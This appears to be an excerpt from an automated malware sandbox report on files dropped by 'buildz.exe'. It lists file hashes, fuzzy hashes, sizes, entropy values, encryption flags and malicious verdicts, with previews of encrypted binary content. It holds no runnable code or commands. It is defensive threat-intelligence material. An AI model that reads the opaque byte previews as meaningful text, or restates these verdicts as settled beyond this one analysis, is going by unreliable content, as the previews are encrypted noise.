                        MD5:C3A4645EAE2F6E4FD6F0B8F143A4FE58
                        SHA1:C4B66226F6F1EE6C0AFF6BF43C97C503204D5769
                        SHA-256:5AE6115CE511B3850111006F57BAE0A84E9186F649E48870689EEBF8F9A2F0B3
                        SHA-512:4CCA3F191A4049D36B197C5D7C82BB75E6956C22836C5C447C8DF73347CA5EDE7547F1B8C47D5A62AF7CB822614F99E722677FF5BA6DD1A46C470058DB1B8DC4
                        Malicious:true
                        Preview:{. "n.~.U'..6b.h...CC#.r,s...{...O.=..'tY..^-...w...j......v..v.k.[v.y@....m......>;..t.t.z/...#...=.o....u=1...b....l.@.G{X.=....h...,...2..i.R$.........>./.N.<(:.KKNr.[.~....D...>.W.hW.Q..!....i.K........!..%u..J..(....W..NY.vP.Dw.....4...S..9.O^".....GG...5..mE.Vg...E7.z..O...}.-2..6CT..-.d,...sW..Q..I......#xv..:4..}.W.`..6....F.zeq."......;..+H._....;.=..V.>G.......h.m ........j$..Lz.]/......<...o..~...Tn.V....hFC.'.9..e.AI.7....:!..E|.C........F..6[.....d....)."..M>..e6.q-...z.e.`.r..su.m.r..e...}5!.%sV...m.c.".B....4..|.1...kTG......y..c.L...Y..f.N.j....=.q....5....7k.......,n.........._A..#/.J.4..x`.d.........~D.=`..p......5..r..G.).FON..@N?....^|KY7..4.X....;..1H..I.../(*..LG...&.1...>m.4."]'...f....s..>>.l.QO.o.AB..S.F~.4>.pP........Q.......>'...t K..>r>.q........."-qt|.wR.`#.."..."^.l.&....X..W9.8.foX..,.f...".$>.....H.R...('q....]...Iw......No......].Xr..t....~.V.C1..r.?......&.....}}...."..-i.....y..i.+........Vd~>.....b...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):60006
                        Entropy (8bit):7.996763358848614
                        Encrypted:true
                        SSDEEP:1536:HFrF5B6veBnf3jPFeIKq+9yWVqMCm/x0A:BnvAtoqnCgx0A
                        MD5:DF2C5D12652906ABF9528E4175E981CE
                        SHA1:AA429A21B026DFB064D0117F2EDE84B02BB94BBF
                        SHA-256:3903048109EC9F3FF4B0635F64D763DC303BB12702FEBAF3779409436BE04A67
                        SHA-512:1C2BEA7731871772F3DC10D79858D2636F7EC82D4432D0148866A6A524DED978D22CF148B1742AB2E7AB9527408A099EF61324303CA73DD4205701AAF0F01C56
                        Malicious:true
                        Preview:{. ".(.m4..f..V"a..M...j."...f.a....>....N...Vn.P.....)....OeJ.~.Ya..L...2.kS..pb......u...GDPis....M..p..4......,j4/ ...9.m...m.(S.,.S....&L.D.1d..-.."s~.........x........E...>8....1.AlV.1...t..S.....o0...R...ad ....S..la..2.`PA.........Y....f..DT.. w9.....%......^.f}+...\.L./.?.-..p..~4y%u.3..../......4..D.k.......2RV<..]....__.H..6h..8%..!.:.[E..V.o....o.L.b:.uf)H.n.~..%)KC....A.:f'.X.........ja...f...$.pU..V..h.:..R......m`.}-.ji.&..R...|..:.`.).p...]"..Q..4...E6.IW0..y.e'..c.b..).-y\..i.Pp`.,h...,.-Pt....B{..-7Hq...,?Y:..i...\.0...~..P..."!.[&b.Qq.1.....A....+.~.K.......S?.s.....|.3Z....Yl+.a..1_........5...W..B...Z..ZgC.;h9.s#........<....4.p..(%ch3....B.....%....B.<Q1.j.A.L.....I....i....."F.N.y3..D..8.a.x.J...YW*..s..k-..mVg.........gPS..n. u.N..[.q.9...o:..4....}G.Z.L.R..u&-.......2..\+....1....D.=....4..r..z..5...._.#..6.y..!N.~....i *g3.=...f4. 6...-....*Th.?a`V..f..h..9...-.r...SAZ....L..f.....U.1.;....,...(Z...L.}.j...7......v".=...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):60323
                        Entropy (8bit):7.9966833690137955
                        Encrypted:true
                        SSDEEP:1536:UlCkMsAvq6OEDkyxLkIk5+vIosTeAnlE7yWtLeQkA:6nqVyIkgvIUcA
                        MD5:3D242D63A91281888FFC735B59D3B539
                        SHA1:F243849C94EA876A8C5A7062C00E8BA3A8F21C52
                        SHA-256:ED1330518749D7AFD3D93EFB696CE2E214CB7C8F0C4B0EE6CF901B2523B7E381
                        SHA-512:C7DD76AAB0E0660B4C409F62B047FA40431A8595A3EDC30A2181D7D54435C1E13C832415E406EB63BACF9D244E9B86A8204D3BD6E7A81611069097EB60605A33
                        Malicious:true
                        Preview:{. "....;V.O.R..oo..ce.R....8.-~.N..l.=..C.mV..T........,WF..O.*n.p..{.].S..._.[;l.rw._1....P..'.-C..Y..u...U......W.....^.}....;..A....y......3.Y..N&..|jiEhr...;.h1.;l.I.x.=.zg..pV.)....7...ZHy.tU...vH.s-...4H!.o...0r&.+..[..g....W..J...|..!..'...'.,.0t([G...P.x.3......&..E.........0*.Rx.....N-f..>)...3ThJ....#F.Ey..u.?...}@..2...x..+F...J"0.X..$..V..D].X......I.U......=.K...c.....Fnz.*,77...r........i...d..._..#.....RX..j..?3....P....?..y.>}..L..Aep@.;...&KQV....>6....w......@.v ...4RF.r.~]...*..@....yW*=...~.m..r..."..].y.0.....0..~....w......o.?...g...XFCf....F...4?.YN....>v.4I=...Dc....H'wc.....a......r.<:.u!.C.9iU_..~.*M..2......nTZ}Y.."B...zy...F./....Q...?......b...;...."..........J7...w+;/...2.6o../&......s.j.V;..9<y..;.9w.y...*..y..-.b..ufC...h......O.f.RD?k..Y-6.....D*......t....(.PjXAN.......&.R..-~..%.......$4..K......R..mQ.`....MPA2....-.+.J./....z.....)l.....K.?h.....{H.y...._.....i...kYVK..P....*O......<...5!.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61830
                        Entropy (8bit):7.996983469154952
                        Encrypted:true
                        SSDEEP:1536:30ElB4Cn2JigCyoJgnDmvkPMspXzzYtF+wZxZA:EEh2MgCfJmDmc3XXYiw9A
                        MD5:B747783F46047846A6BA3055A042AEE3
                        SHA1:87F6FF0A31C0A8EE85D85B0B7530D15A06FB3CE8
                        SHA-256:EC7AEBF0F24A0384D34F6FD15D4C1D0E32DE4A40B6E7A93DC1C71C334A78DB22
                        SHA-512:B90D07C2956430A093585915302B40D863B1C9EB2B314BE84C3418D5AA0454A75035064B2A34902DB98793550F086F7844CD1F805AE8EFAF6E967EED53B7C83E
                        Malicious:true
                        Preview:{. "..x.Z..~3...GT.9..<.2...Z.9:....y.A...=e.GZJT...a...KQ.dzZ_..._....}..[:.......y..\.f,..'.>.;....S.o1..1x...}88FbT..M[._....G.p<...,j.........3Z.......t..qt..K...F.{$.@..0F.~...zp...x..*...u......Q..(Z.C..`.....|.....H@.k.......Vi..|..#x...........a.+...2.l....J....#.....Z.....W..(Lb...;(..... ......f...S......O.^~h....e...8.=...,!.....[..EX.g4>4.m....c.....mr'N.....B.....B;j.Vyb..i.....p.|.)..DD...Z.Y?(.Q.h.......Q....ok.$K...(>._DwoO+..4.W..~*.D......2l.K.....N..T-;&4G....S.(....:....b..u...]<..{....-...}..n..;.c..;. Ci....6V....4.t..ojt.S.1..x..Z.T.8_f.QX..C..1..-L....a.1.==k,......`.....{kX..)....?. R....b..~&...I^..e.$.?..1...........Z.....4..O.5.1A.........0OT?b.S9m.5.X..z....../J...a....3.y.0....)>6>.&..u..P..Y.?%..hj..zXz8.J.aI.=.Q..c....y..G..R..,,?u...ztJ.m&FO...s....A..]r.GU..=./..&..2..S.O{.yY...........\...M-...n.x2..........|....<F*8a3...._..RPc..C.H.7i..].v...R.......1R.......7...[P...`.. ..C..`.../.T.b.....Q|...Qbq...=@
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):84376
                        Entropy (8bit):7.9979145044896
                        Encrypted:true
                        SSDEEP:1536:mXeGPrYm97VxF45rZmgWG+ULoBB+kUM+ilBkt/oQlvbbooA:seOJ97N45r4HoUsilBmfbbooA
                        MD5:9E6C2629D5692AC33EAFDC8942DEC321
                        SHA1:84B0DA1B59A6CC8547A86AF9AF3910C8B84DDBE7
                        SHA-256:07CB4D99E028DC74B3D8412D6085DC24177ECDE8E0225C56AFB85B7D4F5B6569
                        SHA-512:78C2435713D3EC01A8383FDB4F8A45F5FC212CF2B1D8666C54674A39D92801202903B6A6AF0E295F09BC3110C71584C7E4C059F667187DF0C55DDA12DE952039
                        Malicious:true
                        Preview:{. "....Qf......C...Qd..5m.it=L...d....>..|.R..Vo..S..|B..9.\..!'..a.=.N.....+.N'....O.n._.^?.B...eAT..7*.....d)..p../.N<......~.:.Z..M.d..\.%DTdX.*..!.TP...t..\..v..[..z..n..L|.f..t%....z[..3]...M..R...a...........tyfH....s.Sm<..y. ..}3....p%..u...4...]..t)|d..:....Ct.WX.f.......S.2...Q.i...e..~..K.[..~Q.%6|.j<r.SyA,..6.....b.(..D+yL...Y.*p.9..\3f...eh...>...v.3w\L.yk..'.Q.6< .6Q...K3..n....._.........&....W...4U=.-.@.......G....c4..T..H....MV.}..|...-=......L_.tU#W.:^.."..G...}q......:%..O./..w...v.h...GA.&MKB.o\.Cg...(.+.o.d$`.....S.......K.Q.....8Eu..&.j.~...F..m ..96F................YeN9.>_.......q...*n.q..X,z....M..._nu!!m..7/).....>...8....0q...=&..u..6a._...7....C....."..fou.}%k..b2pbWK..6....-[.G^V.....t.$....^..?Kh../.p><_..k[.@`...B...&F.PW..[...*.......LK].....i..H..?L..<X..?.?c..... U]R*.^P.............Q....z..u`-m...?...3....I..VIy...P."]...|....TD.....K.>.z..G._.0..@....[.\..N=......w@?.f.a.E.}~V...H..[(..*.u2.vTq.Mwk.....Z%...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):59182
                        Entropy (8bit):7.996982708508384
                        Encrypted:true
                        SSDEEP:1536:j5nuvRC6TNE0qcgzNPOu7BJXhf1M0jdEwoEu4xA:H6ZE04NPrR1rA
                        MD5:A8FCA2B578B642AEA1DCBD7E12BC5B48
                        SHA1:73E3B375E0D478F30E2C256357C868BD6CB571C7
                        SHA-256:973E8BD1558AF4F27CC477539E89C590688631C7F56D1AC4E065847DE12B3CF7
                        SHA-512:DDFAED051C7AF9A3DBE25F389E844B25A6161F7FF4AF28B68037526D6C2DFE967DD1D2A1CEEBA5C2A572BC5C1BE901A6A5B1100EC59922FF3205EF56FAAF772B
                        Malicious:true
                        Preview:{. "..X....T.N.......Q..h.6.4.J>....{.'w.G..OTH...P.6.l.1.....-.).v.?f......U<"b.&.%..lV... .....R.?i.&l..~U.q~".XO..G.._.N.g.....n.da..#....x.!l+I,.........y..\.8c.Ss.&3J..o.a[Xv.R.....{..]a..3@.ioD..."..6..e".h.a.H...n..!...vj.`#.y%...j.JD....1..i..}1Z...w..X......-%K"ZS..~.....a....g!q......!b3....6....A...Xu`..~u{U.. J.s.l.......#\.R.W.9kN...]...4..{....5.xW..D.s.67.4.K.>....ut.A.)....]Qof.8[&#.F...vy..U.v..B.Z..."...._.;........}HZ4q.......!.. fR..J*.G!2.R..9^......o..j.....D.i.1.C..W.o1.....RZnH4(.....B....$..H..!"E!V.....C.g.N.E...9......x....wJ.'.=..`r@....9Hs.,...u...Sx^...`.|E'.C...d.=Sq].{..B..... .....].....=.^.{.Y..uN[.......,.".cqJ2...D%..e..)...xw..6oj,..j!.$.. ;.7....D..m....V.a....bDU@.w..W.{t....u..(8.^.JQ............|.......[.]..U.t...Q6....3.Z%..01*.w..;.lD...k.#h..[I...3....U.1.aQ.?..4N....e..C.V.R...$..*....*$^.xd......8..<R...1e..0.u....I...p.y..2K.7.c..xY....%.iF...n.....VFf.p.n#RG.no..Ju.hI..#..@Z1.p.edF
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53116
                        Entropy (8bit):7.996310563936101
                        Encrypted:true
                        SSDEEP:1536:1J2wbgdZ3SREPcvRP3UTenRHveQQx+w2asTVFzJTA:1J2wOJIqu9sQQSzpA
                        MD5:7FB0DC374C157873A3C99ED716249A45
                        SHA1:80D20435437ED48367E9E6ED9BBF8BD07CF09F22
                        SHA-256:7AE37FEF509ECB0556508CDC5A7652945629BD6E2F7C2E5EF745531A0428AB1C
                        SHA-512:9AA0998141B9B91EDA692BBCA045F07E2713B98AB2A7B409B905DA3C9626557F2D677AC8208A978BAFE33CECCCC9D2BF7B7678053C1650866BCC774F725EB8D9
                        Malicious:true
                        Preview:{. "..L.n5C>*..*.Mu.;..\...w.9..0........../.~..<_wt...+_..]...<.x..w.rv_.+....{..s...|#.;`t.....:B|.e.:...D..,06A.e..i ..)....c.e.......9...u..7..>..4....A.X...].jr....a6LSRu.>+...N;.f.z{Y.d9.[z.u......U.A.......L......+M.U.4c......<...Y..l......*...?........T+...|.."..#.m..Q\..[....)p...0?...;Z.I.?f[..O...u}..C.[...Xgn.7..m....6...}h...FyX"..P..)..$....~......E...VzwA?.5.*..g...l.%1}*..8..#.]....K...........+a..O..0..U....$.3.|...........CYp`G.[+..~U4U.V&.>0.5..'_,6".@......A_.:q.Ox+..1.z...qQ..5..%..,....c.:K.......u...hU.m...*.....xMH"..!.m..b..r....?P....FJ...P.Q.....>.....0 A.[g..E.^6=.....w.+..`...v..U.#.T...t...g.#R..6.2Kc.T..e.~TX...Sp.xYmr.I.............d...'.J..[....N.Ck.....Y|^.....\....1...... ;... .8[(.."s,....q......V.).=.T^..?8/K.+..$..B.............7.lC.?&.n....1..m.].t...^&*N.b.g..6.m....uXn......zV\...M<...<.3.;..y.b.t..0*.FC.(.(n...z..e.g.e."yzv.Q..6p.!n]v.&;..:8&..&...o..q...f._.k.b.3.^.0I..^.....l.;#2>...}.!...O.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):54270
                        Entropy (8bit):7.9972585000939365
                        Encrypted:true
                        SSDEEP:1536:k6asQE7vGqO/YEBtbSZ+5X2mbRVenYQWP205taEG7hJ4A:FtGjYEBoZ62m+cP205cuA
                        MD5:E0D6881BD5308261C3EFF78D107804C3
                        SHA1:B19323B772B37DCEAD439DB2A748CFB7B725566E
                        SHA-256:B86DF493FAC0F301AE55B2A62EA9137D189594913CD889C36C8F8382B1C12671
                        SHA-512:F9F0A53489ED20C0A2175C026C60B5703CA9DA177179E52D51CE0E72FAC7CE6C4A35300A0FD126F1B5B85271C73013486134210DE27E3F16817137EB54A30173
                        Malicious:true
                        Preview:{. "......u.+..b\.vQ....i..a...1!..S| .Z.......8.N,.u...m...2..G...n...a...A....I7FF.&q[./..E..tm..5.J..g..T._.q.F..`...`@.E..P.....a}..8."K..Cy.[.Y..e.o7t.#G .*...k=..x......uc.nw...0k|J..[=........(H%..N0I..P.@.h.....k.....p.N].\...3p.*.-.W.:~H3~.....m...............J.V.p..O3....^_.B.(...~..Ai:`<p...;.0).9;2.D...N*.E..T.q.g........i(.IF..O.^5.iZ)....f..O..nt.....D/.`.....{Vx.F..K.[y.s.}....Ejy..s@s.c(/......%..<...v.PH.....)uSq.Y.........8U..;I2.....M.*.0"Q.D.<T....ie1q.9.9~.V..&.......]..Y...1.=...@.@.. G..=#.[m%./...I/#i.k5}.)..._..N......u....@..U..(!n.Q.{.h.z.<.u..XFn.oIs..#!.Z.2cS].E.....jz....A..n.$w...K...siE.H.|...u..1..?;.F.....Z?.8....S.....F..~`..;.2.A.....rk..A....v..C;q.@A7v.Uws..;...<<...^g...%uL.^.;z..6...^...j.....LD..k2..h..;....@......}`:....Bg6...~(....1.c.|C........].ng.(..K......qZ....B"q.B0...:....t{..5.iD..~.y.f....6...p.."b..!q..............Du...A..I.1?.....M..b.O.M...h^..F>.NY.......r.^......Dw.._..l.....c.w..?9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3816
                        Entropy (8bit):7.954428404052553
                        Encrypted:false
                        SSDEEP:96:UKAHGj2BumjhiiKygP5zNQDtYHiH45vMm8x/Fb5uM9GCw5A:18Gj2AsKy+5zNctkiCaxt8TvA
                        MD5:12F554863D6A0700B24266AAABF8FC61
                        SHA1:A7D14ACCCFC81FD7E5AFA9F97D442D3D6C4A22A9
                        SHA-256:A30D621821C9BDCB7C0630697C6A8437D8622F72490FC37F0B80F4B363CEC198
                        SHA-512:50A51D49FB2B09FEF21E0962DE83F69934B5B463D1254DA141B47861A970AE9A252431EF4A83C45E21021F27679740B2A3D9BAB8BBF2992274A7EE501CD2D182
                        Malicious:false
                        Preview:{. "X.*..u.y.t.].^i-:..|Z.L...}.;pH p......u...>..Y.......j$bVU...- ..R3.e...l..V.0... @..j..1..u.K.W.G/ej.Q....\....W...`....?.v..'9...\..y$i!{.p].-=...6.....s.5p.O....#WF..wX...8..+.W/..........k`..1m.[p..,\...z|f.j..F.}..eU..`.&...~iSXK%z...........<. 5.5.;g...;w(.L..;.....~..6d..NGR.1/.jF...).f*...W....nK.8.8.x....B..xh@.1....|.Y&..y...<....7.......n...q4H8....6....R...;..O..0\!...........G:x..t.Q..5....o.L~.D...[.....C..V.p.yqp%].....3N0.6\..f............dRuP@..L^;..3!.......\30.|~cvps..'....}.5..G.6..7m.1. . ..I...gz.[.T.b.\+.>...n.k.i..Q..)!/.....,....:J...?..E.%.......-V.f.6+.-..L.|...F.+.8..j.....`.;..&......>..uP.U^.w7....&..X.Z=.dq...F..C..$X..X.}..6...{U>%..a.b....<.^.._.iw..$YB.tq.......c....u..~...E....t\z.r`V2....b..3...^Lr.j|.....~.... ..b.`.@.g&;M.z..R.Zs..X.t.Q..z96.E...m.D.A.'........0.N.....q..d@3....B5.t<.[..2vgK...}..$.w.R.".>._[...z.d.FJ.I..Dv..n..y.....2.....oD..\.<NG.W.8...Y...Z....A.!7..M.]3....e.m....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3371
                        Entropy (8bit):7.947245753873206
                        Encrypted:false
                        SSDEEP:96:Bjx63M/e9XKrwCnW7lXw5feDcDoF2jcoF0+LbzXYhtA:xx63M2/OWXYIGjfOon2tA
                        MD5:BE2C1B5D8E8E50F3653D8D4148FAD3EE
                        SHA1:0073EBF846C7E5288983DED03F986BAE5918B924
                        SHA-256:4416AAA819417FA80E923B66C56508D2BF02AF4DBADF9D2E4821C150ACFD62AD
                        SHA-512:EC7950F4100E5E3A1883E1F37AFA0DD78987B80EFCFD4A06E1713EE2C2353A614B14AABBB982FECCA459589362E638480F4EF72EB2059ABCACCC72B2FB887B01
                        Malicious:false
                        Preview:{. "....%..B.N.......7@.s.d.......k.\..$...(....:.k..&[.S^.).k...pS.+..|.r.d...j.Y....ClF....jA.0..+..miq.Zs..v.......T..-..:..h...3.&.T..9L.o...Q.eG..he.E.a....G..Z.)k..x...#r..R.."I....&..=m...u%\....=.h..hO......t.h..o .?..JN..nq....#Qf.[..*b.%Q......A..._..E..3...eg...w..e.E.N.*w..^...}.6u....]......IBH..L.;..+.*G"L.O.g.<c.1...f....8gSr....}w`RG...Tr7b..:{../..ef.U.......T?....h..LO......o..>9x.....k..+...n-y..$.S..<.#......K..r.nq..)..*..:6..:...7E.+3.T.p.<..")T..$....m....C...2........~...E...e=..&...:..a.)-..............}......UWR.z.k.-AL;&..6...\l....ut];......@...*....d.......s...7...9......3..y1.Xg.E ....:....Y..D..w!1.[p.........v.?fv......8.mZ.5va.K.`..._...eO.g.....1.w...T.?B.1.". ..w..V....{I28....&..........s. #.s[;...r.......b.=..6.0....i"..lx.qd7P.._..O.b]..Y.T.<...dn;{...#...l..c.u..J..A.Xb...).2.......[.mL..............C......R..Q2.!q..vp...."..T..<..$.,..../.uv.]...t5.........9..#Qa.. ....q....w.m....x.^.b/..t.r....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3050
                        Entropy (8bit):7.93877225736606
                        Encrypted:false
                        SSDEEP:48:98s8Lh48cPKMyNK3xOZUUQGmljv5K9Bt98InXCPVOoZdiwrDvqt4HAA3vg0s7zHA:khchyN9ZUUQGgjs9zHXC8LKDvW4Hz3vj
                        MD5:590FE95DB02BDD94E21159D886610881
                        SHA1:DA7CFF04B411E407CB7E30BD7B2CCA187847CE75
                        SHA-256:FCDF44CA2536B999FE9D181D4B65A16932D6E584E222ED00C8C06B320EADA53F
                        SHA-512:6C06DFC5E787B99CF391DAC7BF4D5D6F609F48658A81ED5953AE1ECF4E18EC870E848BEAA1C0ED72FE77BD2C74FFA5AF8F93CF134DAB2AA410742A82361F2566
                        Malicious:false
                        Preview:{. ".V.u....g.4.#.0..o.-.....m#'......G.."Q.C.<.."aF.=....-.....!;.V......ca..T.?h./.yZd..oLl6...K.o..P....../.W..IqPm.q...b.S.H. 1,a.F..Y...T.x..m.i..!.....r.z..4.....+,.....:.8n..X=R..........a..lt...s!...E.WY.?N@...&2.m.g..f.......k\'z6....U..;...#u..WmC.7.........#...w...x~.?8.1.v..`.dSJ.S.g......U..O..".f..7.=.A.KY""9..I.K.........gL.9@Q.=t.(..5....&D...)b.).~.K.x.<A)..#.c...w.H.....$/..3';$0....l...4....d....!..Bsh...1G........?>c.i......_...../.;.[7!:.E..>..G&..TP.... ....84....&...z.......B....;k...P.y0.....Bb8..t...t.X=.....>.........k.l.....F...2......~4.hRpEa..7P...1.Q.o...S......xi.........{.y..........c.*.%...ol3.....fa2.x....FQ.+_...k`.F.....J._..b.z[.U.w....b........8...Da....Dx.. w.!..8~.....F...).D.#.fk..k....L\.....\.....G_....S..B..8.._$.&....7.Z.L.e........;"#.S..~Wb...-._.a.AX.....r$.....X0ELF..xP.+...;..P.}2..O.j.yV...TG..F...&.q.i0..;[9..VTl&E.a\..._V.U..8a.oH:~ek.J."-.L...+V.M1.^...c.k\..R.'.;R.W..7.,....F..f.3..2Z.6d. Zrm
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3195
                        Entropy (8bit):7.942516411871902
                        Encrypted:false
                        SSDEEP:96:rw+tt6qsd41eJEEkb3B+ivHSg1VJpRRdGBA1A:rwiIqs25EkrTvSg1VLvsBA1A
                        MD5:9578E6C625B0C328C2CB5EBD15CA0A2F
                        SHA1:E0F579DD2E2255C8073521E1AEC0590606B9B08C
                        SHA-256:AC85BE641F363A7DAACADEC3F1DBA0CA69467FDAE03DE263246CA8B11D5EFBC6
                        SHA-512:7ED9A62FEAC195DB29232C3F71A7477BB743D54C54CA5984A605EFA6C0D3A541DC994DC837901DFEE3459E0AD019982BD5A105BA556D56421C3664F32B0ACA0C
                        Malicious:false
                        Preview:{. "k{...9D...c.....'Uw...5.\..t"....>..K..f. 6.|.x.Vszy\I.E.]bzd:....}+...tU..9J|...jv.w.H='...{..,3.$...U..Jk.......T..rX...<M...u..d5..._/.{V)...h..b......d...m%*R.D.G.b..DJ...RE...6Sm....08>...S..0P`.Yqx....L.ar....F...V..j.,...h...w.7.........i.!.y..)U.....nir.Q{.:.W!T....c.xc....a).Xm.~..3#...C..O?....m..y.F.=..-....b...Fi.(.....3.....}n=s'...+XS...g}....!%.L..:k.."..1$...........k...~.....;...........x3..c,..-s. ]...m......xm.. `..u....7....$WAnt..>...G.7....Ij..".o...K..ly.{....`...I.#.x9....s.#...u".........T.i./.l.^..y6Dl.6..?.?%...j7.......0.ms.}..N...>....W....U.|XZY...lwo..L.d.R...1.....Y..k...*.^D5..G.\:...wKyB..E&c~.p.q.....Y.PW...P......3.N..6...&...8..FM...yN....[2_.^@.'..I...G.R...=.~(..?..a..c~Iv.!....[f9l........#,,.........&.8Y.....{..SAS....<..Q.B.6.....[..;.M...p.2Q.h.....4..rz.|.6qd..t..3..lG...O.(.3..N....;..u,..d.......w...`~fn.!.3A....V..4.F....Xp)........\./..s.|...Jx.....E.........T_x.V.#..X.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3391
                        Entropy (8bit):7.939108792208114
                        Encrypted:false
                        SSDEEP:48:GxzM5d9JHj0unrayMC0U7PUdvX6yDg7+vQDuWg9fTmKJwszaiHIkdab9KV8GUD:GxYdvH5rabC0OPUdv7PBJNRIkYb8VHA
                        MD5:DFB7FFA2BF9B2B247C212051D5917B32
                        SHA1:A60888F67206AC17E1A582B64BDD16C3A824901C
                        SHA-256:726502AB43AD614DFB7E9579973A148C25AA07F69CCB60D7B2D7F9FA0475413B
                        SHA-512:38A076757EB69944759C15957AE4890EB1C42DA803F341F6284F0230DB2DF1115D447C61E544C34BD95229F04216250D76771701A5483A0BF22E7DFA618B9170
                        Malicious:false
                        Preview:{. "..r......`.......G.E.@..X.d.x..y..%...r.f&.q.....k..h6sZ^...H..s...}...d...9..'..h.*>X.....Wt.....`..3......h6.!q.....%.....*..T.I!&..:.6...f..^.2....9w".^q.....^v..^..).O_ZD.,m8N.G5....CC.$...o....IG0..~[.\.......fl...]t...........>d..F.GF../..q..45@*%..*R\J.E..o........c\...a?.............n...PoT....b..wKd&g.:j..@Q..=]7..ZX.M...2...=.c...,<../.......^..i.....b.....6.Pl..c..:...X.(.G.F..6..O..&..y!Sv......h.Wl..5..U.1..j..iV.z.......^.>.hMr.b%$-....p...n.l.*..R..'.....T...o.....%...,.*.=.yR..e.S.u..S.[L.......-x....V....n..BY.g..(....m.....^R..6....E....Q&../..._,..Y.N..(k...VsZ'....1V....T..&.k.D.Q<)p..u...g..z.H...*..H.......o....3:.....H^..E.t_.......X..M.WC...F].0..5.........K.w.[t4.Fp.V...A~.r.m.......P..B../`.C..s(....P...Z...\../............{.."yi..V%.....P....>..b.C.,..+|{7r8g..!.-C.,.....0...+...Z...Y.[..zh....N..DB.G.=`A.a....{.Y.Za..c.....8....e.Y...i..V..y7..)...8....c.:.....>./#.Rn..|...T..`...s...z$.Ah.4..%].E....S.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3391
                        Entropy (8bit):7.938896082322525
                        Encrypted:false
                        SSDEEP:96:uewa21ocwH7Kq+TvFBt3T3zUwtzFZoDG6ALywb+jnswAfA:uewZ1mH75+Tv9XhFZIcLyoSyA
                        MD5:06CB6034691C6FAC7F65E8A3DB20BD71
                        SHA1:0FC1BC062310AF83E97D8B7620D6E9920D241197
                        SHA-256:FF9800FB67D5212F01A2CD49820491717D7D8208F5FB617FD62DB969DCDC497D
                        SHA-512:7774E636D805D17EC0A8D589B423389AA01CB9776A4A9FC73AA033BBABAD1242858A4508DD1CFD3B27A04C4CEAD5CE9E7EC73E3874D6B705E026FB6DFDA0AB1B
                        Malicious:false
                        Preview:{. " ...@.9.m;>Yq..G.. .J\..,.].`..........'|1~..}1.Uu.g.......K.M%.>%....%c.$.*f.....4.|.S.P..TxT.m.b.5K.?.#k....y}..dsw.}`....r[.*.AH.|...y2..........}V...t.%...X...{.5......GA..N..Q........Ve..p.MM*.v....tG9../.I..i..@.i....P..m.z..\I..;.)..&E.....K....`..%<.R..T....\C....[../.....&g.'X%...u....0..?............M.X=m..`...w....z..P..b.3E.0f....8R..F...`..'h....:zXf.^.....j...C..XR.3..sGHw...A... ..$;>[....l...l..FL\wi...zd....uY*...+.F.....5ak.}.S...KD....+/..B...|.H.=...&nmi...w%Yw..Q.;..{<...>(?^Tkp...rY...v.....^w...|8..A..*v........ .....8.(s...V.......q....~...|Z........*.xp.D.".G.lK...m.,o$....y..>K5.8..SY....n...0g63..u......;...".a.1.j..0&t....U.)..S^........!.;..;R..=.c..%......D.0.1lX.m.C;..?n.$.OF..r..T:..~.....f.+...\. E..nZ...A...".s[_..Sa......{...[.....i..0..S.c".|n.a.^.6.M.YR.wF.(<..?..~...A.^9.k.[.....(.-.v..........D...?R....).......dG...F0.p..]g..W.7.W.'.......fj...'...v..c.H....f".k.GzOS...g.......k...%...9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3226
                        Entropy (8bit):7.945603885797158
                        Encrypted:false
                        SSDEEP:48:pGgtRiVK0EaGf92k+KuEtNnmYdFCsqTAU58LHApBDd7e888nXI9Knk4uPwqG2Jqa:pGoAg02fH+LEt1jqT3W85dqIsKIJLcA
                        MD5:11B9F61A2DF00584FE2E7CECD6DC2FA5
                        SHA1:A1C9A7C54DF8BEE82F4AF9C6BEFFE06FFF3C0935
                        SHA-256:0178173DE45EC5FC4A8D2F798F607FE1906A3FEF9BFE7647FF5A7F4A0592AC2D
                        SHA-512:3EAB3E4CC0ED9418739F0C09330055C0E242D6E54AC4A08B47E276623A4FA4134AEE085DB19CCFDAF5528929940B58F375F5A3F683E13ED9DD2CB12C264E68A5
                        Malicious:false
                        Preview:{. "p.........u..f..le..:t...:....k........"...j.^2...,.8.Yw.k..kTJ...............u.z.W.k....=..l..].,.5... ...v>3p\E...u...-.....jKx....D.v.SX>.4*:j.N.7U:...->.._....<....F....J$......;......I.Q. .1..@...Q.W*.I0..3......,&(b[.&ni..]\E.0\-.V......c(.3e...h.?.@.L......s]L...m.I..+w.Y...;.d..!...Y.W'.0^FD...i.....;.*|..J`.w.U.mA...]..9q.....B.M.fE..`..*..Y..l.w......aEvi..x..9g.../..} .....d...E....d.m.].>..T.....}C..a.]..P..E...Sv....8N..O..........~.l.]-.......7.4.V.....+$......I.$....~... ..8....o...^....<..<%v..........5.N.%H.0....P1....4.)..p.C.Kn.$...m........@..6.........D7..g.`4.x.+%W.}S.}...q...?..k"WS..T.Bc.hwU}.u.7...g....p6...t.X......@......J...#\.~.J.U..Z.(...m..lM........7l...X..R.....;.d...@U...|&o...q...D7.X...n..m|9kX..v7Y.............O.u.......O..........?..TCJU}#R........;..... x.....4...<..gg..p.p.....dGf....HMU...._.k.r&....qW..f.$Z-..9`..<..2y...M1...m.cS.s...6D...=...s1.../ig.4...m..1../.NB.
